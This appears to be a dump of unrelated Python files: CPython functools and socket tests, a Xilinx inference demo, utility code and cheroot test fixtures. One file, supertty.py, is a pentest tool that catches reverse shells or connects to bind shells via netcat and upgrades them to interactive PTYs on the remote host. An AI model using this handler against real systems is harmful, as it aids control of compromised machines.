expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_method_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
self.arg = "base"
@t.register(int)
def _(self, arg):
self.arg = "int"
@t.register(str)
def _(self, arg):
self.arg = "str"
a = A()
a.t(0)
self.assertEqual(a.arg, "int")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t('')
self.assertEqual(a.arg, "str")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t(0.0)
self.assertEqual(a.arg, "base")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
def test_staticmethod_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register(int)
@staticmethod
def _(arg):
return isinstance(arg, int)
@t.register(str)
@staticmethod
def _(arg):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_callable_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@A.t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@A.t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_abstractmethod_register(self):
class Abstract(abc.ABCMeta):
@functools.singledispatchmethod
@abc.abstractmethod
def add(self, x, y):
pass
self.assertTrue(Abstract.add.__isabstractmethod__)
def test_type_ann_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
return "base"
@t.register
def _(self, arg: int):
return "int"
@t.register
def _(self, arg: str):
return "str"
a = A()
self.assertEqual(a.t(0), "int")
self.assertEqual(a.t(''), "str")
self.assertEqual(a.t(0.0), "base")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Iterable[str] is not a class.'
))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
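# Helper classes for the cached_property tests below: CachedCostItem guards a
# lazily computed, cached attribute with an RLock; OptionallyCachedCostItem
# exposes both cached and uncached access paths; CachedCostItemWait lets the
# threaded test stagger concurrent first accesses via an Event; and
# CachedCostItemWithSlots has no __dict__, so caching is expected to fail.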
class CachedCostItem:
_cost = 1
def __init__(self):
self.lock = py_functools.RLock()
@py_functools.cached_property
def cost(self):
"""The cost of the item."""
with self.lock:
self._cost += 1
return self._cost
class OptionallyCachedCostItem:
_cost = 1
def get_cost(self):
"""The cost of the item."""
self._cost += 1
return self._cost
cached_cost = py_functools.cached_property(get_cost)
class CachedCostItemWait:
def __init__(self, event):
self._cost = 1
self.lock = py_functools.RLock()
self.event = event
@py_functools.cached_property
def cost(self):
self.event.wait(1)
with self.lock:
self._cost += 1
return self._cost
class CachedCostItemWithSlots:
__slots__ = ('_cost')
def __init__(self):
self._cost = 1
@py_functools.cached_property
def cost(self):
raise RuntimeError('never called, slots not supported')
class TestCachedProperty(unittest.TestCase):
def test_cached(self):
item = CachedCostItem()
self.assertEqual(item.cost, 2)
self.assertEqual(item.cost, 2) # not 3
def test_cached_attribute_name_differs_from_func_name(self):
item = OptionallyCachedCostItem()
self.assertEqual(item.get_cost(), 2)
self.assertEqual(item.cached_cost, 3)
self.assertEqual(item.get_cost(), 4)
self.assertEqual(item.cached_cost, 3)
def test_threaded(self):
go = threading.Event()
item = CachedCostItemWait(go)
num_threads = 3
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
threads = [
threading.Thread(target=lambda: item.cost)
for k in range(num_threads)
]
with threading_helper.start_threads(threads):
go.set()
finally:
sys.setswitchinterval(orig_si)
self.assertEqual(item.cost, 2)
def test_object_with_slots(self):
item = CachedCostItemWithSlots()
with self.assertRaisesRegex(
TypeError,
"No '__dict__' attribute on 'CachedCostItemWithSlots' instance to cache 'cost' property.",
):
item.cost
def test_immutable_dict(self):
class MyMeta(type):
@py_functools.cached_property
def prop(self):
return True
class MyClass(metaclass=MyMeta):
pass
with self.assertRaisesRegex(
TypeError,
"The '__dict__' attribute on 'MyMeta' instance does not support item assignment for caching 'prop' property.",
):
MyClass.prop
def test_reuse_different_names(self):
"""Disallow this case because decorated function a would not be cached."""
with self.assertRaises(RuntimeError) as ctx:
class ReusedCachedProperty:
@py_functools.cached_property
def a(self):
pass
b = a
self.assertEqual(
str(ctx.exception.__context__),
str(TypeError("Cannot assign the same cached_property to two different names ('a' and 'b')."))
)
def test_reuse_same_name(self):
"""Reusing a cached_property on different classes under the same name is OK."""
counter = 0
@py_functools.cached_property
def _cp(_self):
nonlocal counter
counter += 1
return counter
class A:
cp = _cp
class B:
cp = _cp
a = A()
b = B()
self.assertEqual(a.cp, 1)
self.assertEqual(b.cp, 2)
self.assertEqual(a.cp, 1)
def test_set_name_not_called(self):
cp = py_functools.cached_property(lambda s: None)
class Foo:
pass
Foo.cp = cp
with self.assertRaisesRegex(
TypeError,
"Cannot use cached_property instance without calling __set_name__ on it.",
):
Foo().cp
def test_access_from_class(self):
self.assertIsInstance(CachedCostItem.cost, py_functools.cached_property)
def test_doc(self):
self.assertEqual(CachedCostItem.cost.__doc__, "The cost of the item.")
if __name__ == '__main__':
unittest.main()
|
googlenet_resnet50.py
|
#!/usr/bin/env python
# Copyright 2019 Xilinx Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys, os
import glob
import time
import threading
from apps.aks.libs import aks
def usage(exe):
print("[INFO] Usage: ")
print("[INFO] ---------------------- ")
print("[INFO] ", exe, " <img-dir-for-googlenet> <image-dir-for-resnet50> ")
def enqJobThread (name, graph, images):
# Get AKS Sys Manager
sysMan = aks.SysManager()
print ("[INFO] Starting Enqueue:", name)
for img in images:
sysMan.enqueueJob(graph, img)
def main(imageDirectory, graphs):
fileExtension = ('*.jpg', '*.JPEG', '*.png')
kernelDir = "kernel_zoo"
sysMan = aks.SysManager()
sysMan.loadKernels(kernelDir)
lgraphs = {}
images = {}
# Load graphs
for graphName, graphJson in graphs.items():
sysMan.loadGraphs(graphJson)
lgraphs[graphName] = sysMan.getGraph(graphName)
images = {}
for graphName in lgraphs.keys():
images[graphName] = []
for ext in fileExtension:
images[graphName].extend(glob.glob(imageDirectory[graphName] + '/' + ext))
pushThreads = []
sysMan.resetTimer()
t0 = time.time()
for name, gr in lgraphs.items():
th = threading.Thread(target=enqJobThread, args=(name, gr, images[name],))
th.start()
pushThreads.append(th)
for th in pushThreads:
th.join()
sysMan.waitForAllResults()
t1 = time.time()
print("\n[INFO] Overall FPS:", len(images) * 2 / (t1-t0))
for name, gr in lgraphs.items():
print("\n[INFO] Graph:", name)
sysMan.report(gr)
print("")
# Destroy SysMan
sysMan.clear()
if __name__ == "__main__":
if (len(sys.argv) != 3):
print("[ERROR] Invalid Usage!")
usage(sys.argv[0])
exit(1)
if not os.path.isdir(sys.argv[1]):
print("[ERROR] No such directory:", sys.argv[1])
usage(sys.argv[0])
exit(1)
if not os.path.isdir(sys.argv[2]):
print("[ERROR] No such directory:", sys.argv[2])
usage(sys.argv[0])
exit(1)
# Get images
imageDirectory = {}
imageDirectory['googlenet_no_runner'] = sys.argv[1]
imageDirectory['resnet50_no_runner'] = sys.argv[2]
# GoogleNet and ResNet50 graphs
graphs = {}
graphs['googlenet_no_runner'] = 'graph_zoo/graph_googlenet_no_runner.json'
graphs['resnet50_no_runner'] = 'graph_zoo/graph_resnet50_no_runner.json'
# Process graphs
main(imageDirectory, graphs)
|
supertty.py
|
#!/usr/bin/env python
"""SuperTTY v1.0
Usage:
supertty.py --port <port> --host <host> [--udp] [--shell <shell>]
supertty.py --port <port> [--ip <ip>] [--udp] [--shell <shell>]
supertty.py (-h | --help)
Options:
-h --help Show this screen
--port <port> Port number to listen on, or to connect to on the remote host [default: 4445]
--host <host> Host to connect to for bind shells
--udp Listen for shells over udp
--ip <ip> IP address to listen on for reverse shells [default: 0.0.0.0]
--shell <shell> Shell spawn as PTY [default: /bin/bash]
"""
banner = """ ( )
)\ ) * ) * ) ( /( ) )
(()/( ( ( ( ` ) /(` ) /( )\()) ) ( /( ( /(
/(_))))\ ` ) ))\ )( ( )(_))( )(_)|(_)\ /(( )\()))\())
(_)) /((_)/(/( /((_|()\(_(_())(_(_())_ ((_) (_))((_)\((_)\
/ __(_))(((_)_\(_)) ((_)_ _||_ _\ \ / / _)((_) (_) (_)
\__ \ || | '_ \) -_)| '_| | | | | \ V / \ V /| || () |
|___/\_,_| .__/\___||_| |_| |_| |_| \_/ |_(_)__/
|_|
(c) Bad Hombres 2017
"""
import os
import subprocess
import sys
import time
import signal
import select
import pty
import tty
import threading
import time
import fcntl
from docopt import docopt
args = docopt(__doc__, version="SuperTTY 1.0")
p = None
print banner
nc = []
if args["--host"] is None:
print "[+] Starting a reverse listener on port: %s" % args["--port"]
nc = ["nc", "-nvlp", args["--port"]]
if args["--udp"]:
nc[1] = "-nlvup"
else:
print "[+] Connecting to a bind shell on: %s:%s" % (args["--host"], args["--port"])
nc = ["nc", args["--host"], args["--port"]]
def sigint_handler(signal, frame):
print "!!!!!SIGINT!!!!!"
p.kill()
sys.exit()
signal.signal(signal.SIGINT, sigint_handler)
try:
term = os.environ["TERM"]
rows, columns = os.popen('stty size', 'r').read().split()
print "[+] Got terminal: %s " % term
print "[+] Got terminal size (%s rows, %s columns)" % (rows, columns)
print "[+] Setting up local terminal....."
os.system("stty raw -echo")
master, slave = pty.openpty()
#tty.setraw(master)
#tty.setraw(slave)
p = subprocess.Popen(nc, stdin=subprocess.PIPE, stdout = slave, stderr = slave, close_fds = True)
p.stdout = os.fdopen(os.dup(master), 'r+')
p.stderr = os.fdopen(os.dup(master), 'r+')
os.close(master)
os.close(slave)
print p.stdout.read(30)
go = threading.Event()
fd = p.stdout.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
def recv_data():
while not go.isSet():
try:
data = p.stdout.read(1024)
if data:
sys.stdout.write(data)
sys.stdout.flush()
except:
pass
t = threading.Thread(target = recv_data)
t.start()
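# Upgrade the remote dumb shell into a proper interactive PTY: spawn a pty on
# the remote side via python's pty.spawn, then propagate the local TERM/SHELL
# and window size so full-screen programs (vim, less, etc.) render correctly.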
shell = args["--shell"]
p.stdin.write("python -c 'import pty; pty.spawn(\"%s\")'\n" % shell)
p.stdin.flush()
time.sleep(2)
p.stdin.write("export TERM=%s\n" % term)
p.stdin.flush()
p.stdin.write("export SHELL=%s\n" % shell)
p.stdin.flush()
p.stdin.write("stty rows %s columns %s\n" % (rows, columns))
p.stdin.flush()
p.stdin.write("reset\n")
p.stdin.flush()
while 1:
line = sys.stdin.read(1)
if ord(line[0]) in [4]: break
if line == "": break
p.stdin.write(line)
go.set()
except:
print "[!] An unexpected error occurred: {e}".format(e=sys.exc_info()[0])
finally:
os.system("stty raw echo")
print "[+} Resetting local terminal....."
os.system("reset")
p.kill()
print banner
print "[+} Hack el planeta!....."
os._exit(0)
|
utils.py
|
import numpy as np
from queue import Queue
from threading import Thread
# Yield successive {n}-sized chunks from {lst}.
def chunks(lst, n):
for i in range(0, len(lst), n):
yield lst[i:i + n]
def _map_reduce_thread(map_fn, input, q):
q.put(map_fn(input))
# Performs a multi-threaded map-reduce operation.
# This is done by chunking {inputs} into at most {max_threads} separate lists, then
# feeding each list into a separate {map_fn} which runs on its own thread.
# Waits for each thread to return its results. Results are compiled into a list of results and
# fed to the {reduce_fn}. The result of this call is returned.
def perform_map_reduce(map_fn, reduce_fn, inputs, max_threads):
threads = []
thread_count = min(max_threads, len(inputs))
chunked_inputs = chunks(inputs, int(len(inputs) / thread_count))
q = Queue()
for c in chunked_inputs:
t = Thread(target=_map_reduce_thread, args=(map_fn, c, q))
t.start()
threads.append(t)
for t in threads:
t.join()
return reduce_fn(list(q.queue))
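# Convert a TensorFlow dataset of {'sentence', 'label'} examples into padded
# numpy arrays (input ids, attention mask, token type ids) plus a label array,
# using a HuggingFace-style tokenizer's encode_plus().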
def downconvert_tf_dataset(dataset, tok, pad_token=0, max_seq_len=128):
inputs = []
atts = []
toks = []
outputs = []
for i,m in enumerate(dataset):
input = tok.encode_plus(m['sentence'].numpy().decode("utf-8"),\
add_special_tokens=True, max_length=max_seq_len,)
input_ids, token_type_ids = input["input_ids"], input["token_type_ids"]
attention_mask = [1] * len(input_ids)  # 1 marks real tokens; padding below stays 0
# Pad strings to exactly max_seq_len
padding_length = max_seq_len - len(input_ids)
input_ids = input_ids + ([pad_token] * padding_length)
attention_mask = attention_mask + ([0] * padding_length)
token_type_ids = token_type_ids + ([0] * padding_length)
# Double-check results.
assert len(input_ids) == max_seq_len, "Error with input length {} vs {}".format(len(input_ids), max_seq_len)
assert len(attention_mask) == max_seq_len, "Error with input length {} vs {}".format(
len(attention_mask), max_seq_len
)
assert len(token_type_ids) == max_seq_len, "Error with input length {} vs {}".format(
len(token_type_ids), max_seq_len
)
# Form lists.
inputs.append(np.asarray(input_ids))
atts.append(np.asarray(attention_mask))
toks.append(np.asarray(token_type_ids))
outputs.append(m['label'].numpy())
return [np.asarray(inputs), np.asarray(atts), np.asarray(toks)], np.asarray(outputs)
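# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example of perform_map_reduce: each worker thread sums the squares
# of one chunk of numbers, and the reducer adds up the per-chunk partial sums.
if __name__ == "__main__":
    numbers = list(range(100))
    total = perform_map_reduce(
        map_fn=lambda chunk: sum(x * x for x in chunk),  # runs once per thread
        reduce_fn=sum,                                   # combines partial sums
        inputs=numbers,
        max_threads=4,
    )
    print("sum of squares:", total)  # 328350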
|
testing.py
|
"""Pytest fixtures and other helpers for doing testing by end-users."""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from contextlib import closing
import errno
import socket
import threading
import time
import pytest
from six.moves import http_client
import cheroot.server
from cheroot.test import webtest
import cheroot.wsgi
EPHEMERAL_PORT = 0
NO_INTERFACE = None # Using this or '' will cause an exception
ANY_INTERFACE_IPV4 = '0.0.0.0'
ANY_INTERFACE_IPV6 = '::'
config = {
cheroot.wsgi.Server: {
'bind_addr': (NO_INTERFACE, EPHEMERAL_PORT),
'wsgi_app': None,
},
cheroot.server.HTTPServer: {
'bind_addr': (NO_INTERFACE, EPHEMERAL_PORT),
'gateway': cheroot.server.Gateway,
},
}
def cheroot_server(server_factory):
"""Set up and tear down a Cheroot server instance."""
conf = config[server_factory].copy()
bind_port = conf.pop('bind_addr')[-1]
for interface in ANY_INTERFACE_IPV6, ANY_INTERFACE_IPV4:
try:
actual_bind_addr = (interface, bind_port)
httpserver = server_factory( # create it
bind_addr=actual_bind_addr,
**conf
)
except OSError:
pass
else:
break
httpserver.shutdown_timeout = 0 # Speed-up tests teardown
threading.Thread(target=httpserver.safe_start).start() # spawn it
while not httpserver.ready: # wait until fully initialized and bound
time.sleep(0.1)
yield httpserver
httpserver.stop() # destroy it
@pytest.fixture(scope='module')
def wsgi_server():
"""Set up and tear down a Cheroot WSGI server instance."""
for srv in cheroot_server(cheroot.wsgi.Server):
yield srv
@pytest.fixture(scope='module')
def native_server():
"""Set up and tear down a Cheroot HTTP server instance."""
for srv in cheroot_server(cheroot.server.HTTPServer):
yield srv
class _TestClient:
def __init__(self, server):
self._interface, self._host, self._port = _get_conn_data(
server.bind_addr,
)
self.server_instance = server
self._http_connection = self.get_connection()
def get_connection(self):
name = '{interface}:{port}'.format(
interface=self._interface,
port=self._port,
)
conn_cls = (
http_client.HTTPConnection
if self.server_instance.ssl_adapter is None else
http_client.HTTPSConnection
)
return conn_cls(name)
def request(
self, uri, method='GET', headers=None, http_conn=None,
protocol='HTTP/1.1',
):
return webtest.openURL(
uri, method=method,
headers=headers,
host=self._host, port=self._port,
http_conn=http_conn or self._http_connection,
protocol=protocol,
)
def __getattr__(self, attr_name):
def _wrapper(uri, **kwargs):
http_method = attr_name.upper()
return self.request(uri, method=http_method, **kwargs)
return _wrapper
def _probe_ipv6_sock(interface):
# Alternate way is to check IPs on interfaces using glibc, like:
# github.com/Gautier/minifail/blob/master/minifail/getifaddrs.py
try:
with closing(socket.socket(family=socket.AF_INET6)) as sock:
sock.bind((interface, 0))
except (OSError, socket.error) as sock_err:
# In Python 3 socket.error is an alias for OSError
# In Python 2 socket.error is a subclass of IOError
if sock_err.errno != errno.EADDRNOTAVAIL:
raise
else:
return True
return False
def _get_conn_data(bind_addr):
if isinstance(bind_addr, tuple):
host, port = bind_addr
else:
host, port = bind_addr, 0
interface = webtest.interface(host)
if ':' in interface and not _probe_ipv6_sock(interface):
interface = '127.0.0.1'
if ':' in host:
host = interface
return interface, host, port
def get_server_client(server):
"""Create and return a test client for the given server."""
return _TestClient(server)
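# --- Illustrative usage sketch (not part of this module) ---
# These fixtures are meant to be consumed from an end-user test module, roughly:
#
#     from cheroot.testing import get_server_client, wsgi_server  # assumed import path
#
#     def test_root(wsgi_server):
#         wsgi_server.wsgi_app = hello_app          # any WSGI callable under test
#         client = get_server_client(wsgi_server)
#         response = client.get('/')                # attribute access maps to HTTP verbs
#
# The module-scoped fixture starts the server in a background thread and stops
# it once the module's tests finish; _TestClient.__getattr__ turns .get/.post/
# ... into request() calls with the corresponding HTTP method.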
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
VSOCKPORT = 1234
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
